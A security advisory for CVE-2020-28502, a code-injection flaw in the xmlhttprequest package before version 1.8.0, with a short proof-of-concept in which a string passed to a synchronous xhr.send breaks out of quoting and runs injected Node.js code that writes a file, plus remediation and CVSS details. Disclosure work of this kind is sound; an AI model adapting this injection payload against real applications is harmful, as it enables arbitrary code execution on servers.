Arbitrary Code Injection

Affecting org.webjars.npm:xmlhttprequest artifact, versions [,1.8.0)

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

org.webjars.npm:xmlhttprequest is a wrapper for the built-in http client to emulate the browser XMLHttpRequest object.

Affected versions of this package are vulnerable to Arbitrary Code Injection. Provided requests are sent synchronously (async=False on xhr.open), malicious user input flowing into xhr.send could result in arbitrary code being injected and run.

POC

const { XMLHttpRequest } = require("xmlhttprequest")

const xhr = new XMLHttpRequest()
xhr.open("POST", "http://localhost.invalid/", false /* use synchronize request */)
xhr.send("\\');require(\"fs\").writeFileSync(\"/tmp/aaaaa.txt\", \"poc-20210306\");req.end();//")

Remediation

Upgrade org.webjars.npm:xmlhttprequest to version 1.8.0 or higher.

References

CVSS Score

8.1
high severity
  • Attack Vector
    Network
  • Attack Complexity
    High
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C
Credit
rinsuki
CVE
CVE-2020-28502
CWE
CWE-94
Snyk ID
SNYK-JAVA-ORGWEBJARSNPM-1082938
Disclosed
05 Mar, 2021
Published
05 Mar, 2021